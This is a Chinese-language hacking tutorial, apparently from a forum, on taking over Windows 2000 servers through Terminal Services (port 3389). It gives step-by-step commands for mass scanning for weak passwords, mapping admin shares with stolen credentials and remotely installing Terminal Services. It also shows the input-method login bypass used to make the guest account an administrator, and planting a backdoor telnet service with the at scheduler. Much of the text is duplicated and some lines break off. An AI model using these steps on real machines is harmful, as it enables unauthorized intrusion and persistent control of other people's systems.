[第3天]從終端服務3389講起
好現在我們就來說一個簡單的***,從3389找個肉雞(沒有肉雞的話,對自己的技術提高是沒好處的,不能老是看卻不練啊,陳同學你說對嗎?)
請各位注意,我這裏並不是說什麼爛鬼輸入法漏洞。這種漏洞差不多已經絕跡了,太難找了,如果有人找到了,那恭喜你啦。衆所周知,有開3389的一般都是服務器,也就是說有很大可能帶局域網的,而內部***比外部要方便一點,這對大家是很好的,我想看我這個東西的很多都是學生吧(聲明我就個學生哦)。如何能快速方便的得到開了終端的肉機呢?這需要用到兩個工具,都是掃描工具來的,scanner3.0和焦點的xscan。打開scanner,輸入一段IP,範圍要大一點,scanner速度很快的。在“所有端口從”那裏都填3389,點擊“開始”就可以開工了。
很快的,掃描完成,結果出來了。點擊右下腳的“刪除”把多餘的IP刪了,只留下開了3389的IP。再點擊“保存”,把結果保存到文件夾裏。找到保存文件的目錄,打開它。用記事本的替換功能把它保存爲一個純IP的TXT文件。“編輯-替換”在“查找內容”裏輸入要刪除的垃圾,再點“全部替換”就行了。打開xscan,點擊左邊的藍色按鈕,進入“掃描板塊”,只需在“SQL-Server弱口令”“NT-Server弱口令”前打鉤,其他都清除掉。再點擊右邊的藍色按鈕,進入“掃描參數”,鉤上“從文件獲取主機列表”,打開剛纔替換成純IP的TXT文件,確定之後就可以掃描了。這時需要比較長的時間!(注意我是拿3.0爲例的,其他的也差不多)。確定目標,用mstsc(登陸終端的工具,這個我不喜歡用,但確實很容易上手的)登陸對方主機後,打開對方cmd.exe,輸入“net use”,先看看有沒有人也在連接這部機(安全一點好,畢竟不是在學雷峯啊)。“net view”命令之後當出現一堆前面帶\\字符的就表示~~就表示什麼呢??我
請各位注意,我這裏並不是說什麼爛鬼輸入法漏洞。這種漏洞差不多已經絕跡了,太難找了,如果有人找到了,那恭喜你啦。衆所周知,有開3389的一般都是服務器,也就是說有很大可能帶局域網的,而內部***比外部要方便一點,這對大家是很好的,我想看我這個東西的很多都是學生吧(聲明我就個學生哦)。如何能快速方便的得到開了終端的肉機呢?這需要用到兩個工具,都是掃描工具來的,scanner3.0和焦點的xscan。打開scanner,輸入一段IP,範圍要大一點,scanner速度很快的。在“所有端口從”那裏都填3389,點擊“開始”就可以開工了。
很快的,掃描完成,結果出來了。點擊右下腳的“刪除”把多餘的IP刪了,只留下開了3389的IP。再點擊“保存”,把結果保存到文件夾裏。找到保存文件的目錄,打開它。用記事本的替換功能把它保存爲一個純IP的TXT文件。“編輯-替換”在“查找內容”裏輸入要刪除的垃圾,再點“全部替換”就行了。打開xscan,點擊左邊的藍色按鈕,進入“掃描板塊”,只需在“SQL-Server弱口令”“NT-Server弱口令”前打鉤,其他都清除掉。再點擊右邊的藍色按鈕,進入“掃描參數”,鉤上“從文件獲取主機列表”,打開剛纔替換成純IP的TXT文件,確定之後就可以掃描了。這時需要比較長的時間!(注意我是拿3.0爲例的,其他的也差不多)。確定目標,用mstsc(登陸終端的工具,這個我不喜歡用,但確實很容易上手的)登陸對方主機後,打開對方cmd.exe,輸入“net use”,先看看有沒有人也在連接這部機(安全一點好,畢竟不是在學雷峯啊)。“net view”命令之後當出現一堆前面帶\\字符的就表示~~就表示什麼呢??我
想大家都非常明白吧!,如果不明白的話,我。。(也不知道怎麼說了 )
想做個補充
想做個補充
發現很多朋友對什麼叫終端服務有點模糊
好,我們就詳細說說 畢竟這個概念很重要的
終端服務提供了通過作爲終端仿真器工作的“瘦客戶機”軟件遠程訪問服務器桌面的能力。終端服務只把該程序的用戶界面傳給客戶機。客戶機然後返回鍵盤和鼠標單擊動作,以便由服務器處理。每個用戶都只能登錄並看到它們自己的會話,這些會話由服務器操作系統透明地進行管理,而且與任何其他客戶機會話無關。客戶軟件可以運行在多個客戶機硬件設備上,包括計算機和基於 Windows 的終端。其他設備,如 Macintosh 計算機或基於 UNIX 的工作站,也可以使用其他第三方的軟件連接到終端服務器。
好,我們就詳細說說 畢竟這個概念很重要的
終端服務提供了通過作爲終端仿真器工作的“瘦客戶機”軟件遠程訪問服務器桌面的能力。終端服務只把該程序的用戶界面傳給客戶機。客戶機然後返回鍵盤和鼠標單擊動作,以便由服務器處理。每個用戶都只能登錄並看到它們自己的會話,這些會話由服務器操作系統透明地進行管理,而且與任何其他客戶機會話無關。客戶軟件可以運行在多個客戶機硬件設備上,包括計算機和基於 Windows 的終端。其他設備,如 Macintosh 計算機或基於 UNIX 的工作站,也可以使用其他第三方的軟件連接到終端服務器。
終端服務可以在應用服務器模式或遠程管理模式下在服務器上進行配置。作爲應用服務器,終端服務提供了一種有效而可*的方式,通過網絡服務器分發基於 Windows 的程序。在應用服務器模式下,終端服務爲可能無法正常運行Windows 的計算機顯示 Windows 2000 的桌面以及目前基於 Windows 的大多數應用程序。在遠程管理模式下使用時,終端服務提供了遠程訪問的能力,使您可以從網絡上的任何地方虛擬地管理您的服務器。
終端服務有以下好處:
更快地顯示 Windows 2000 的桌面。終端服務架設了一座從舊式桌面遷移到 Windows 2000 Professional 的橋樑,爲非計算機桌面以及需要進行硬件升級才能在本地完全運行 Windows 2000 操作系統的計算機提供了一種虛擬的 Windows 2000 桌面環境。終端服務客戶可用於多種不同的桌面平臺,包括 MS-DOS、基於 Windows 的終端、Macintosh 和 UNIX。(與 MS-DOS、Macintosh 和基於 UNIX 的計算機的連接需要附加的軟件)。充分利用已有的硬件。終端服務擴展了分佈式計算模型,允許計算機同時作爲瘦客戶機和具有完整功能的個人計算機操作。當計算機在現有的網絡上時,可以繼續使用,同時也可作爲能仿真 Windows 2000 Professional 桌面的瘦客戶機使用。
程序的集中配置。使用運行在 Windows 2000 Server 上的終端服務,所有程序的執行、數據的處理以及數據的存儲都在服務器上進行,程序得以集中配置。終端服務可確保所有客戶機都能訪問當前版本的程序。軟件只能在服務器上安裝一次,而不能安裝在您單位的每個桌面上,這樣可減少單獨更新計算機所花費的成本。
遠程管理。終端服務提供了對 Windows 2000 Server 的遠程管理,爲系統管理員提供了從任何客戶機通過廣域網或撥號連接遠程管理其服務器的一種方法。
功能:
易於使用
可管理性
安全性
更快地顯示 Windows 2000 的桌面。終端服務架設了一座從舊式桌面遷移到 Windows 2000 Professional 的橋樑,爲非計算機桌面以及需要進行硬件升級才能在本地完全運行 Windows 2000 操作系統的計算機提供了一種虛擬的 Windows 2000 桌面環境。終端服務客戶可用於多種不同的桌面平臺,包括 MS-DOS、基於 Windows 的終端、Macintosh 和 UNIX。(與 MS-DOS、Macintosh 和基於 UNIX 的計算機的連接需要附加的軟件)。充分利用已有的硬件。終端服務擴展了分佈式計算模型,允許計算機同時作爲瘦客戶機和具有完整功能的個人計算機操作。當計算機在現有的網絡上時,可以繼續使用,同時也可作爲能仿真 Windows 2000 Professional 桌面的瘦客戶機使用。
程序的集中配置。使用運行在 Windows 2000 Server 上的終端服務,所有程序的執行、數據的處理以及數據的存儲都在服務器上進行,程序得以集中配置。終端服務可確保所有客戶機都能訪問當前版本的程序。軟件只能在服務器上安裝一次,而不能安裝在您單位的每個桌面上,這樣可減少單獨更新計算機所花費的成本。
遠程管理。終端服務提供了對 Windows 2000 Server 的遠程管理,爲系統管理員提供了從任何客戶機通過廣域網或撥號連接遠程管理其服務器的一種方法。
功能:
易於使用
可管理性
安全性
易於使用
功能 說明 詳細信息,請參閱:
自動的本地打印機支持 Windows 2000 Server 終端服務可以添加並自動重新連接終端服務客戶所連接的打印機。 提供對本地打印機的客戶訪問
剪貼板重定向 現在,用戶可以在運行於本地計算機和終端服務器上的程序之間剪切和粘貼。 共享的剪貼板性能增強 對緩存功能的增強,包括持久性緩存、數據包的利用和數據幀大小,明顯地改進了終端服務的性能。 位圖緩存
漫遊式斷開連接支持 此功能使用戶不用註銷即可從會話中斷開連接。在斷開時會話仍可保持活動狀態,這使得用戶可以從另一臺計算機中或在稍後某個時間重新連接到現有會話。重新連接需要登錄,以便在任何時候都能保證每個會話的安全性。 註銷或斷開連接多登錄支持 用戶可以登錄到多個會話,同時從一個或多個客戶機到多個 Windows 2000 Server,或者多次登錄到一個服務器。這樣,用戶就可以同時執行多項任務或運行多個單獨的桌面會話。 管理用戶和客戶機可管理性功能 說明 詳細信息,請參閱:
會話遠程控制 支持者可查看或控制另一終端服務會話。鍵盤輸入、鼠標移動以及圖形顯示可在兩個終端服務會話之間共享,爲支持者提供了診斷和解決配置問題以及遠程培訓用戶的能力。此功能對於帶有分支機構的單位特別有用。 遠程控制
網絡負載平衡 網絡負載平衡使終端服務客戶可連接到運行終端服務的服務器組中最輕閒的成員。 網絡負載平衡和終端服務
基於 Windows 的終端 根據 Windows CE 操作系統和遠程桌面協議 (RDP) 的自定義實現,不同的製造商可提供基於 Windows 的終端。
客戶連接管理器 管理員和用戶可以爲一個程序或全部桌面訪問建立到服務器的預定義連接。客戶連接管理器在客戶機桌面上創建圖標,以便能通過一次單擊連接到一個或多個終端服務器。想在計算環境中提供單個程序的管理員可以創建連接並將該連接與終端服務客戶軟件一同分發。 管理終端服務用戶連接
終端服務授權 終端服務授權幫助系統管理員和採購部門跟蹤客戶機及其相關許可證。 授權終端服務
分佈式文件系統 (DFS) 支持 對分佈式文件系統 (DFS) 的支持使用戶可以連接到 DFS 共享位置,而且使管理員可以從終端服務器主控 DFS 共享。 分佈式文件系統概述終端服務管理器 管理員可以使用終端服務管理器查詢和管理 Windows 2000 Server 上的終端服務會話、用戶和進程。 管理終端服務終端服務配置 終端服務連接配置可用於創建、修改和刪除 Windows 2000 Server 上的一個或一組會話並訪問服務器設置。 配置終端服務與 Windows 2000 Server“本地用戶和組”以及“Active Directory 用戶和計算機”的集成 管理員可以按照爲 Windows 2000 Server 用戶創建帳戶的相同方式爲終端服務用戶創建帳戶。另有一些字段可用來指定終端服務專用信息,如終端服務配置文件路徑和主目錄。 終端服務用戶帳戶 與 Windows 2000 Server 系統監視器的集成 與 Windows 2000 Server 系統監視器的集成使管理員可以監視器終端服務系統性能,包括跟蹤處理器的使用情況、內存分配和分頁內存使用情況,並在每個用戶的會話之間交換。 性能監視消息傳遞支持 管理員可以就一些重要的信息警告用戶,如系統關機、升級或新程序。 使用終端服務管理器遠程管理 具有管理級特權而且可訪問終端服務管理級實用程序的任何用戶都可以遠程管理運行終端服務的服務器的各方面工作。
可配置的會話超時設置 管理員可以通過配置會話超時來減少服務器資源的使用。管理員可以指定活動會話的長度以及會話可在服務器上閒置多長時間 配置會話限制
安全性
功能 說明 詳細信息,請參閱:
加密 多級加密使管理員可以根據安全性需要在三種不同級別(低級、中級或高級)上加密在 Windows 2000 Server 和終端服務客戶之間傳輸的所有或部分數據。另外,終端服務登錄過程包括更改密碼、桌面解鎖以及屏幕保護功能解鎖
功能 說明 詳細信息,請參閱:
加密 多級加密使管理員可以根據安全性需要在三種不同級別(低級、中級或高級)上加密在 Windows 2000 Server 和終端服務客戶之間傳輸的所有或部分數據。另外,終端服務登錄過程包括更改密碼、桌面解鎖以及屏幕保護功能解鎖
。登錄過程是加密的,以確保用戶名稱和密碼的安全傳輸。終端服務支持在服務器和客戶機之間的 40 位和 128 位加密(128 位加密只能在美國和加拿大使用)。 確定加密的級別
限制登錄嘗試和連接時間 管理員可以限制用戶登錄嘗試次數,以防止有人未授權訪問服務器。另外,個別用戶或分組用戶的連接時間可以進行限制。 配置終端服務
限制登錄嘗試和連接時間 管理員可以限制用戶登錄嘗試次數,以防止有人未授權訪問服務器。另外,個別用戶或分組用戶的連接時間可以進行限制。 配置終端服務
終端服務配置概述
終端服務連接提供了客戶機可用於登錄到服務器上某個會話的鏈接。TCP/IP 連接是當終端服務在 Windows 2000 Server 上啓用時自動配置的。使用終端服務配置,您可以更改連接的默認屬性或添加新連接。
終端服務連接提供了客戶機可用於登錄到服務器上某個會話的鏈接。TCP/IP 連接是當終端服務在 Windows 2000 Server 上啓用時自動配置的。使用終端服務配置,您可以更改連接的默認屬性或添加新連接。
終端服務配置
打開終端服務配置時,您將會看到已經配置的連接。這稱爲 RDP-TCP 連接。通常,這只是需要爲使用終端服務器的客戶配置的連接。對於終端服務器,只能爲每個網卡配置一個 RDP(遠程桌面協議)連接。如果要配置其他的 RDP 連接
打開終端服務配置時,您將會看到已經配置的連接。這稱爲 RDP-TCP 連接。通常,這只是需要爲使用終端服務器的客戶配置的連接。對於終端服務器,只能爲每個網卡配置一個 RDP(遠程桌面協議)連接。如果要配置其他的 RDP 連接
,您必須安裝附加的網卡。
使用終端服務配置,您可以重新配置 RDP-TCP 連接的屬性,包括限制客戶機會話在服務器上保持活動狀態的時間、設置加密的保護級別以及選擇您希望用戶和組具備的權限。某些連接屬性也可以使用“本地用戶和組”的終端服務擴展程
序在每用戶基礎上配置。例如,當您使用“本地用戶和組”的終端服務擴展程序時,可以爲每個用戶設置不同會話期限。使用終端服務配置,您可以只在每連接基礎上設置會話期限,這意味着相同期限將應用於使用連接登錄到服務器的
所有用戶。
除配置連接以外,您可以使用“終端服務配置”功能配置可應用於終端服務器的設置。包括臨時文件夾的設置、默認連接安全性以及啓用/禁用 Internet 連接器許可。詳細信息,請參閱配置服務器設置。
基於 Citrix CA 的客戶機
終端服務配置還用於爲基於 Citrix CA 的客戶機配置連接。當 Citrix CA 協議和基於 Citrix CA 的客戶軟件添加到該系統時,可以使用 TCP/IP、同步、IPX/SPX 或 NetBIOS 傳輸協議配置這些連接
終端服務配置還用於爲基於 Citrix CA 的客戶機配置連接。當 Citrix CA 協議和基於 Citrix CA 的客戶軟件添加到該系統時,可以使用 TCP/IP、同步、IPX/SPX 或 NetBIOS 傳輸協議配置這些連接
有很多朋友問怎麼開啓3389終端服務下面我們一起來探索一下遠程開啓3389的方法. 首先我們應該瞭解3389終端服務,可以運行在什麼系統下,個人瞭解,終端服務在M$的大部分
產品中都可運行,如:winnt4/win2000server/win2000ADV-server/win2000DS/XP等.
但winnt4中是需要單獨購買的,2000專業版不能遠程安裝終端服務的,至少我沒成功過.
我們在以下的探索中,是以win2000server和高級server爲例的.(現在用的也最多).
現在開始. 假設我們拿到了一個主機的管理員帳戶和密碼.
主機: 192.168.0.1
帳號: administrator
密碼: 7788
2000系統安裝在c:\winnt下
從上面的的介紹可以知道,2000專業版是不可以遠程安裝終端服務的,那我們就要首先來
判斷此主機是專業版還是服務器版,才能進入下一個環節. 我們可以先用對方所開帳戶判斷: c:\>letmein \\192.168.0.1 -all -d
stating connecting to server ...
Server local time is: 2002-1-13 10:19:22
Start get all users FORM server...
--------------------------
Total = 5
--------------------------
num0= Administrator ()
num1= Guest ()
num2= IUSR_servername (Internet 來賓帳號 )
num3= IWAM_servername (啓動 IIS 進程帳號)
num4= TsInternetUser (TsInternetUser)
--------------------------
Total = 5
-------------------------- 一般情況num2/3/4這三個帳戶都是2000server默認開啓的.
2000專業版默認是不開這些帳戶的. 我們也可以掃描對方開放的端口進一步確認:
用掃描軟件如:superscan3.exe掃描對方所開端口
判斷對方是否開啓25,3372等2000server默認開啓的端口. 當然我們還可以使用一些工具,如:cmdinfo.zip
這2個東東可以獲得本地或遠程NT/2K主機的版本,系統路徑,源盤路徑,PACK版本,安裝時間等一
系列信息,一個圖形界面,一個命令行.
通過返回的信息就可以很清楚的瞭解對方主機情況. 還有一些其他的方法來判斷,如:從對方所開的服務來確定等,
從上面的判斷準確率還算高,別的就不一一說明了.
如果你在以上步驟裏發現對方主機並沒有那3個帳戶,默認端口也沒開,
或cmdinfo返回的信息對方是2000專業版,你就要放棄安裝3389的計劃了.
現在我們要進入下一環節:
判斷終端服務到底有沒有安裝? 你也許要問:爲什麼還要判斷啊?我掃描沒有發現3389端口啊
這裏就需要解釋一下,如果裝了終端服務組件,可能有哪幾種情況掃描不到3389端口?
1.終端服務termservice在"管理工具">>>"服務"中被禁用.
2.終端服務連接所需的RDP協議在"管理工具">>>"終端服務配置"中被停用連接.
3.終端服務默認連接端口3389被人爲的改變.如何改變請看修改終端服務默認的3389端口
產品中都可運行,如:winnt4/win2000server/win2000ADV-server/win2000DS/XP等.
但winnt4中是需要單獨購買的,2000專業版不能遠程安裝終端服務的,至少我沒成功過.
我們在以下的探索中,是以win2000server和高級server爲例的.(現在用的也最多).
現在開始. 假設我們拿到了一個主機的管理員帳戶和密碼.
主機: 192.168.0.1
帳號: administrator
密碼: 7788
2000系統安裝在c:\winnt下
從上面的的介紹可以知道,2000專業版是不可以遠程安裝終端服務的,那我們就要首先來
判斷此主機是專業版還是服務器版,才能進入下一個環節. 我們可以先用對方所開帳戶判斷: c:\>letmein \\192.168.0.1 -all -d
stating connecting to server ...
Server local time is: 2002-1-13 10:19:22
Start get all users FORM server...
--------------------------
Total = 5
--------------------------
num0= Administrator ()
num1= Guest ()
num2= IUSR_servername (Internet 來賓帳號 )
num3= IWAM_servername (啓動 IIS 進程帳號)
num4= TsInternetUser (TsInternetUser)
--------------------------
Total = 5
-------------------------- 一般情況num2/3/4這三個帳戶都是2000server默認開啓的.
2000專業版默認是不開這些帳戶的. 我們也可以掃描對方開放的端口進一步確認:
用掃描軟件如:superscan3.exe掃描對方所開端口
判斷對方是否開啓25,3372等2000server默認開啓的端口. 當然我們還可以使用一些工具,如:cmdinfo.zip
這2個東東可以獲得本地或遠程NT/2K主機的版本,系統路徑,源盤路徑,PACK版本,安裝時間等一
系列信息,一個圖形界面,一個命令行.
通過返回的信息就可以很清楚的瞭解對方主機情況. 還有一些其他的方法來判斷,如:從對方所開的服務來確定等,
從上面的判斷準確率還算高,別的就不一一說明了.
如果你在以上步驟裏發現對方主機並沒有那3個帳戶,默認端口也沒開,
或cmdinfo返回的信息對方是2000專業版,你就要放棄安裝3389的計劃了.
現在我們要進入下一環節:
判斷終端服務到底有沒有安裝? 你也許要問:爲什麼還要判斷啊?我掃描沒有發現3389端口啊
這裏就需要解釋一下,如果裝了終端服務組件,可能有哪幾種情況掃描不到3389端口?
1.終端服務termservice在"管理工具">>>"服務"中被禁用.
2.終端服務連接所需的RDP協議在"管理工具">>>"終端服務配置"中被停用連接.
3.終端服務默認連接端口3389被人爲的改變.如何改變請看修改終端服務默認的3389端口
4.終端服務綁定的網絡適配器不是外網的.
5.防火牆和端口過濾之類的問題.
6.....(還有我沒想到的)
其實,我們遇到最多的情況就是以上5種情況. 現在開始判組件是否被安裝. 先與遠程主機連接,映射遠程主機C盤爲本地Z盤
net use z: \\192.168.0.1\c$ "7788" /user:"administrator"
命令成功完成。 然後轉到Z盤,檢查
Z:\Documents and Settings\All Users\「開始」菜單\程序\管理工具>
裏是否有 "終端服務管理器"和"終端服務配置"的快捷方式文件
如有已安裝服務組件的會有,反之,沒有(98% 人爲故意刪的可能性較小)
我們還可以在下一步telnet到對方主機後使用終端服務自帶的命令進一步的核實. 判斷完畢,對方好像是沒有安裝終端服務組件,可以進入下一步:
telnet登陸對方主機,準備安裝服務組件. 在這裏,我強烈建議使用2000自帶的telnet服務端登陸,
有回顯,不容易出錯.個人感覺使用它,一次成功的比例高很多.(呵呵~,個人理解啊!)
就算沒有開,打開用完後再關掉就完了.
.abu.寫的最快速登錄WIN2K TELNET 服務已經把這個方法介紹的非常詳細,
而且他的辦法(在本機建立同名,同密碼帳戶),讓快速實現telnet登陸成爲現實. 假如我們已開啓對方23端口,
telnet 192.168.0.1
輸入用戶名/密碼
*===============================================================
歡迎使用 Microsoft Telnet 服務器。
*===============================================================
C:\>
\\成功進入!!!! 進入後,再次檢查終端組件是否安裝:
c:\>query user
這個工具需要安裝終端服務. 這樣就進一步確定了組件沒有被安裝.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 運行中 . 2002-1-12 22:5
\\類似這樣的信息,可能組件就已安裝. 好!都清楚了,可以開始安裝了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //檢查INF文件的位置
c:\WINNT\inf 的目錄 2000-01-10 20:00 3,770 sysoc.inf
1 個文件 3,770 字節
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //檢查組件安裝程序
c:\WINNT\system32 的目錄 2000-01-10 20:00 42,768 sysocmgr.exe
1 個文件 42,768 字節
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//這是建立無人蔘與的安裝參數
c:\>type c:\wawa
[Components]
TSEnable = on
//檢查參數文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
這一條就是真正安裝組件的命令.
以上這條命令沒有加/R參數,主機在安裝完後自動重起.
如若加了/R參數主機就不會重起. 如果一切正常的話,幾分鐘後對方主機將會離線,當它重新回來時,
3389終端服務就已經開啓.你就可以連上去了. 問題和建議: A 在安裝過程中,不使用/R,有時主機也不會重起,你就要手動重起他,但在使用諸如:iisreset /reboot命令時,對方
的屏幕會出現個對話框,寫着誰引起的這次啓動,離重起還有多少秒. B 一次不行可以再試一次,在實際中很有作用. C 在輸入sysocmgr命令開始安裝時,一定不要把命令參數輸錯,那會在對方出現一個大的對話框,是sysocmgr的幫助,很是顯
5.防火牆和端口過濾之類的問題.
6.....(還有我沒想到的)
其實,我們遇到最多的情況就是以上5種情況. 現在開始判組件是否被安裝. 先與遠程主機連接,映射遠程主機C盤爲本地Z盤
net use z: \\192.168.0.1\c$ "7788" /user:"administrator"
命令成功完成。 然後轉到Z盤,檢查
Z:\Documents and Settings\All Users\「開始」菜單\程序\管理工具>
裏是否有 "終端服務管理器"和"終端服務配置"的快捷方式文件
如有已安裝服務組件的會有,反之,沒有(98% 人爲故意刪的可能性較小)
我們還可以在下一步telnet到對方主機後使用終端服務自帶的命令進一步的核實. 判斷完畢,對方好像是沒有安裝終端服務組件,可以進入下一步:
telnet登陸對方主機,準備安裝服務組件. 在這裏,我強烈建議使用2000自帶的telnet服務端登陸,
有回顯,不容易出錯.個人感覺使用它,一次成功的比例高很多.(呵呵~,個人理解啊!)
就算沒有開,打開用完後再關掉就完了.
.abu.寫的最快速登錄WIN2K TELNET 服務已經把這個方法介紹的非常詳細,
而且他的辦法(在本機建立同名,同密碼帳戶),讓快速實現telnet登陸成爲現實. 假如我們已開啓對方23端口,
telnet 192.168.0.1
輸入用戶名/密碼
*===============================================================
歡迎使用 Microsoft Telnet 服務器。
*===============================================================
C:\>
\\成功進入!!!! 進入後,再次檢查終端組件是否安裝:
c:\>query user
這個工具需要安裝終端服務. 這樣就進一步確定了組件沒有被安裝.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 運行中 . 2002-1-12 22:5
\\類似這樣的信息,可能組件就已安裝. 好!都清楚了,可以開始安裝了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //檢查INF文件的位置
c:\WINNT\inf 的目錄 2000-01-10 20:00 3,770 sysoc.inf
1 個文件 3,770 字節
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //檢查組件安裝程序
c:\WINNT\system32 的目錄 2000-01-10 20:00 42,768 sysocmgr.exe
1 個文件 42,768 字節
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//這是建立無人蔘與的安裝參數
c:\>type c:\wawa
[Components]
TSEnable = on
//檢查參數文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
這一條就是真正安裝組件的命令.
以上這條命令沒有加/R參數,主機在安裝完後自動重起.
如若加了/R參數主機就不會重起. 如果一切正常的話,幾分鐘後對方主機將會離線,當它重新回來時,
3389終端服務就已經開啓.你就可以連上去了. 問題和建議: A 在安裝過程中,不使用/R,有時主機也不會重起,你就要手動重起他,但在使用諸如:iisreset /reboot命令時,對方
的屏幕會出現個對話框,寫着誰引起的這次啓動,離重起還有多少秒. B 一次不行可以再試一次,在實際中很有作用. C 在輸入sysocmgr命令開始安裝時,一定不要把命令參數輸錯,那會在對方出現一個大的對話框,是sysocmgr的幫助,很是顯
眼,
而且要求確定.在你的屏幕上是不會有任何反應的,你不會知道出錯,所以會有B的建議.
而且要求確定.在你的屏幕上是不會有任何反應的,你不會知道出錯,所以會有B的建議.
好了以後你就想幹什麼就幹什麼了。不過有時候還真不知道幹什麼,總之得幹個事,裝個什麼局域網控制軟件,不過不要體積太大,容易被發現。
超強 C 語言代碼,你有信心看懂嗎?
剛剛說有輸入法漏洞的機子很少了,但有些朋友擔心還有怎麼辦,不是吃大虧了嗎?這樣我找了一篇寫的不錯的文章貼一下( 注意是轉載)寫的不錯,據說是新寫的,這位大哥也真閒啊
剛剛說有輸入法漏洞的機子很少了,但有些朋友擔心還有怎麼辦,不是吃大虧了嗎?這樣我找了一篇寫的不錯的文章貼一下( 注意是轉載)寫的不錯,據說是新寫的,這位大哥也真閒啊
WIN2000中文簡體版存在的輸入法漏洞,可以使本地用戶繞過身分驗證機制進入系統內部。經實驗,WIN2000中文簡體版的終端服務,在遠程操作時仍然存在這一漏洞,而且危害更大。
WIN2000的終端服務功能,能使系統管理員對WIN2000進行遠程操作,採用的是圖形界面,能使用戶在遠程控制計算機時功能與在本地使用一樣,其默認端口爲3389,用戶只要裝了WIN2000的客戶端連接管理器就能與開啓了該服務的計算機
WIN2000的終端服務功能,能使系統管理員對WIN2000進行遠程操作,採用的是圖形界面,能使用戶在遠程控制計算機時功能與在本地使用一樣,其默認端口爲3389,用戶只要裝了WIN2000的客戶端連接管理器就能與開啓了該服務的計算機
相聯。因此這一漏洞使終端服務成爲WIN2000的合法***。
工具:客戶端連接管理器,下載地址:自己找吧,天天有好幾種呢。
***步驟:
一,獲得管理員賬號。
我們先對一個網段進行掃描,掃描端口設爲3389,運行客戶端連接管理器,將掃描到的任一地址加入到,設置好客戶端連接管理器,然後與服務器連結。幾秒鐘後,屏幕上顯示出WIN2000登錄界面(如果發現是英文或繁體中文版,放棄,
工具:客戶端連接管理器,下載地址:自己找吧,天天有好幾種呢。
***步驟:
一,獲得管理員賬號。
我們先對一個網段進行掃描,掃描端口設爲3389,運行客戶端連接管理器,將掃描到的任一地址加入到,設置好客戶端連接管理器,然後與服務器連結。幾秒鐘後,屏幕上顯示出WIN2000登錄界面(如果發現是英文或繁體中文版,放棄,
另換一個地址),用CTRL+SHIFT快速切換輸入法,切換至全拼,這時在登錄界面左下角將出現輸入法狀態條(如果沒有出現,請耐心等待,因爲對方的數據流傳輸還有一個過程)。用右鍵點擊狀態條上的微軟徽標,彈出“幫助”(如果
發現“幫助”呈灰色,放棄,因爲對方很可能發現並已經補上了這個漏洞),打開“幫助”一欄中“操作指南”,在最上面的任務欄點擊右鍵,會彈出一個菜單,打開“跳至URL”。此時將出現WIN2000的系統安裝路徑和要求我們填入的
路徑的空白欄。比如,該系統安裝在C盤上,就在空白欄中填入"c:\winnt\system32"。然後按“確定”,於是我們就成功地繞過了身份驗證,進入了系統的SYSTEM32目錄。
現在我們要獲得一個賬號,成爲系統的合法用戶。在該目錄下找到"net.exe",爲"net.exe"創建一個快捷方式,右鍵點擊該快捷方式,在“屬性”->“目標”->c:\winnt\system32\net.exe後面空一格,填入"user guest /active
現在我們要獲得一個賬號,成爲系統的合法用戶。在該目錄下找到"net.exe",爲"net.exe"創建一個快捷方式,右鍵點擊該快捷方式,在“屬性”->“目標”->c:\winnt\system32\net.exe後面空一格,填入"user guest /active
:yes"點“確定”。這一步驟目的在於用net.exe激活被禁止使用的guest賬戶,當然也可以利用"user 用戶名 密碼/add",創建一個新賬號,但容易引起網管懷疑。運行該快捷方式,此時你不會看到運行狀態,但guest用戶已被激活。
然後又修改該快捷方式,填入"user guest 密碼",運行,於是guest便有了密碼。最後,再次修改,填入“localgroup administrators guest /add,將guest變成系統管理員。
注意事項:1、在這過程中,如果對方管理員正在使用終端服務管理器,他將看到你所打開的進程id,你的ip和機器名,甚至能夠給你發送消息。
2、終端服務器在驗證你的身份的時候只留給了你一分鐘的時間,在這一分鐘內如果你不能完成上述操作,你只能再連結。
3、你所看到的圖像與操作會有所延遲,這受網速的影響。
注意事項:1、在這過程中,如果對方管理員正在使用終端服務管理器,他將看到你所打開的進程id,你的ip和機器名,甚至能夠給你發送消息。
2、終端服務器在驗證你的身份的時候只留給了你一分鐘的時間,在這一分鐘內如果你不能完成上述操作,你只能再連結。
3、你所看到的圖像與操作會有所延遲,這受網速的影響。
二,創建跳板。
再次登錄終端用務器,以"guest"身份進入,此時guest已是系統管理員,已具備一切可執行權。打開“控制面板”,進入“網絡和拔號連接”,在“本地連接”或“拔號連接”中查看屬性,看對方是否選擇“Microsoft 網絡的文件和打
再次登錄終端用務器,以"guest"身份進入,此時guest已是系統管理員,已具備一切可執行權。打開“控制面板”,進入“網絡和拔號連接”,在“本地連接”或“拔號連接”中查看屬性,看對方是否選擇“Microsoft 網絡的文件和打
印機共享”,如果沒有,就打上勾。對方如果使用的是拔號上網,下次拔號網絡共享纔會打開。
退出對方系統,在本地機命令提示符下,輸入
net use \\IP Address\IPC$ ["password"] /user:"guset",通過IPC的遠程登陸就成功了。
登陸成功之後先複製一個Telnet的程序上去(小榕流光安裝目錄下的Tools目錄裏的Srv.exe,另外,還有ntml.xex,一會要用),這個程序是在對方上面開一個Telnet服務,端口是99。
copy c:\hack\srv.exe \\***.***.***.***\admin$
然後利用定時服務啓動它,先了解對方的時間:
net time \\***.***.***.***
顯示:
\\***.***.***.*** 的當前時間是 2001/1/8 下午 08:55
命令成功完成。
然後啓動srv.exe:
at \\***.***.***.*** 09:00 srv.exe
顯示:
新加了一項作業,其作業 ID = 0
過幾分鐘後,telnet ***.***.***.*** 99
這裏不需要驗證身份,直接登錄,顯示:
c:\winnt:\system32>
我們就成功登陸上去了。然後又在本地打開命令提示符,另開一個窗口,輸入:
copy c:\hack\ntlm.exe \\211.21.193.202\admin$
把事先存放在hack目錄裏的ntlm.exe拷過去。然後又回到剛纔的telnet窗口,運行ntlm.exe
